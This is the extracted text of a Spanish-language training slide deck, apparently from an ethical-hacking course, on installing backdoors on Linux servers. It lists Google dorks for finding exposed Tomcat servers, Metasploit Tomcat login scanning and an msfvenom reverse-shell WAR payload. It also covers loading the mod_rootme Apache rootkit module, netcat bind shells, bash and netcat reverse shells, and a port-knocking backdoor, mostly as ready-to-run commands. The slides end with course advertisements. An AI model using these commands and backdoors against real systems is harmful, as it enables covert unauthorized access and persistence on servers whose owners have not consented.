AGENDA
1.
2.
3.
Quin soy?
Buscando vulnerabilidades backdoors
Qu es un backdoor?
1. Backdoor SETUID
2. Backdoor Mdulo de APACHE
3. Backdoor Bind Shell
4. Backdoor Reverse Shell
5. Backdoor KnockOut
4. Instalando y configurando backdoors (ejemplos)
5. Informacin sobre el curso
6. Conclusiones
AGENDA
1.
2.
3.
Quin soy?
Buscando vulnerabilidades backdoors
Qu es un backdoor?
1. Backdoor SETUID
2. Backdoor Mdulo de APACHE
3. Backdoor Bind Shell
4. Backdoor Reverse Shell
5. Backdoor KnockOut
4. Instalando y configurando backdoors (ejemplos)
5. Informacin sobre el curso
6. Conclusiones
#whoami
Ing. Sistemas ISO 27001 Lead Auditor, CISM, C|EH, C)PTE,
C)SWAE, C)PEH, ITILv3, C)ISSO, ISO 27002
Instructor Oficial de MILE2
Consultor de Kunak Consulting SAC
http://www.kunak.com.pe
Psiclogo que aun no comienza sus estudios.
Escritor en mis tiempos libres:
http://www.el-palomo.com
Correo electrnico:
[email protected] [email protected] Cuenta de Facebook:
www.facebook.com/El.Palomo.Seguridad.Informacion
AGENDA
1.
2.
Quin soy?
Qu es un backdoor?
1. Backdoor SETUID
2. Backdoor Mdulo de APACHE
3. Backdoor Bind Shell
4. Backdoor Reverse Shell
5. Backdoor KnockOut
3. Instalando y configurando backdoors (ejemplos)
4. Informacin sobre el curso
5. Conclusiones
Qu es un Backdoor (puerta
trasera)?
Los backdoors son programas utilizados por
los hackers para lograr acceso a sistemas
operativos de manera rpida y sencilla.
Existen diferentes tipos de backdoors:
Backdoors en Aplicaciones Web
Backdoors a travs de SETUID
Backdoors en Mdulos de Servicios
Backdoors del tipo Knocking
Arquitectura de los Ejemplos
ATACANTE
- Computador desde el cual se
realizarn los ataques
- Sistema Operativo KALI LINUX 2
TARGET
- Servidor TOMCAT vulnerable
- Aqu se instalaran los backdoors
- Sistema Operativo Linux
Direccin IP: 192.168.4.131
Direccin IP: 192.168.4.130
ATACANTE 2
- Computador desde el cual se
explotaran los backdoors
- Sistema Operativo Linux
Direccin IP: 192.168.4.132
Identificar Servicios TOMCAT
Buscamos TOMCAT en la RED LAN a
travs de NMAP
Nmap sV p 8080 sS TARGET
auxiliary/scanner/portscan/syn
Buscamos TOMCAT/AXIS2 en INTERNET:
Google Dork:
intitle:"Tomcat Server Administration
intitle:"Axis2 Happiness Page" +ext:jsp
Ahora si . Vamos con los
ejemplos
Identificar Vulnerabilidades en
Vamos a utilizar METASPLOIT para identificar vulnerabilidades:
TOMCAT
Root> msfconsole
Root> search tomcat
Root> use auxiliary/scanner/http/tomcat_mgr_login
Root> show options
Root> set RHOSTS 192.168.4.130
Finalmente realizar la carga de un .WAR malicioso para obtener
acceso al sistema operativo.
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.4.131
-f war > meterpreter.war
En el cliente:
Msf> use exploit/multi/handler
Msf> set payload java/meterpreter/reverse_tcp
Backdoor con SETUID
De pronto algunos nunca escucharon de los
permisos GETUID, SETUID y STICKY. Pues
este mecanismo de backdoor est asociado a
SETUID.
Entonces en que consiste el SETUID?
El SETUID es un bit que permite a las
aplicaciones ejecutarse con los permisos de su
propietario. El concepto puede sonar muy
abstracto pero si ponemos un ejemplo es ms
facil entender, vamos a crear un archivo
llamado TEST.C y lo compilamos.
Backdoor con SETUID
Backdoor en Apache Server
Cargamos un mdulo en APACHE de tal manera que no
se realicen cambios a nivel de cdigo en los aplicativos
PHP.
Cuntos administradores de Sistemas verifican los
mdulos cargados en Apache?
Toca compilar un mdulo de APACHE llamado
ModROOTme.
https://github.com/jingchunzhang/backdoor_rootkit/tree/ma
ster/mod_rootme-0.4
Backdoor en Apache
Server
Comandos en el Sistema Operativo
root>cd mod_rootme-0.4/
root>Make Linux
root> cp mod_rootme2.so /etc/httpd/modules
root> /etc/init.d/httpd reload
En el cliente:
Root> nc 192.168.4.130 80
GET root
Backdoor:
BindShell
Las primeras herramientas
utilizados por
Hackers fue la navaja suiza NETCAT.
Una BindShell es un programa corriendo
una SHELL dentro de un proceso de red.
Una BindShell puede estar escrita en
cualquier lenguaje de programacin.
http://netcat.sourceforge.net/download.php
Backdoor: Bind Shell
Comandos en el sistema operativo:
root>./configure
DGAPING_SECURITY_HOLE
root>Make
root> cd src/
root> ./netcat -l -p 8443 -e /bin/sh
root> bg
En el CLIENTE:
C:\>nc64.exe 192.168.75.133 8443
--enable-
Backdoor: Reverse Shell
Tiene el mismo concepto que una
Bind Shell pero realizada de manera
reversa.
Ahora es el servidor quien se
conecta a nuestro cliente. Esta
pensado para poder realizar
bypass de Firewalls.
Backdoor: Reverse Shell
Reverse Shell con BASH
En el cliente:
nc64.exe -l -p 8080 -vvv
En el servidor:
bash -i >& /dev/tcp/192.168.1.34/8080 0>&1
Backdoor: Reverse Shell
Reverse Shell con NETCAT
En el cliente:
nc64.exe -l -p 8080 -vvv
En el servidor:
./netcat -e /bin/sh 192.168.1.34 8080
Backdoor: KnockOut
Knock viene del ingles tocar la puerta.
Este es un backdoor del tipo Reverse
Shell que pasa desapercibido.
Slo puede ser accedido por aquel
que conozca la combinacin de la
puerta correcta.
Backdoor: KnockOut
En el servidor:
Root> $make servidor
Root> ./knock-outd knock-out.conf eth5
En el cliente (atacante):
Root> $make cliente
Root> ./knock-outc 192.168.4.130 knock-out.conf
Root> ./netcat -lv -p 64876
AGENDA
1.
2.
Quin soy?
Qu es un backdoor?
1. Backdoor SETUID
2. Backdoor Mdulo de APACHE
3. Backdoor Bind Shell
4. Backdoor Reverse Shell
5. Backdoor KnockOut
3. Instalando y configurando backdoors (ejemplos)
4. Informacin sobre el curso
5. Conclusiones
Curso de Ethical
Hacking
https://www.facebook.com/sistemasuni/
Lugar: Universidad Nacional de
Ingeniera (UNI) Lima Per
Duracin: 24 horas Curso Bsico
24 horas Curso Avanzado
Certificado: A nombre de la Universidad
Nacional de Ingeniera (UNI)
Prximo Inicio: Inicios Recurrentes
Curso de Seguridad de Informacin
http://www.kunak.com.pe
Lugar: Miraflores Lima Per
Duracin: 60 horas
Certificado: A nombre Kunak
Consulting SAC
Prximo Inicio: Por definir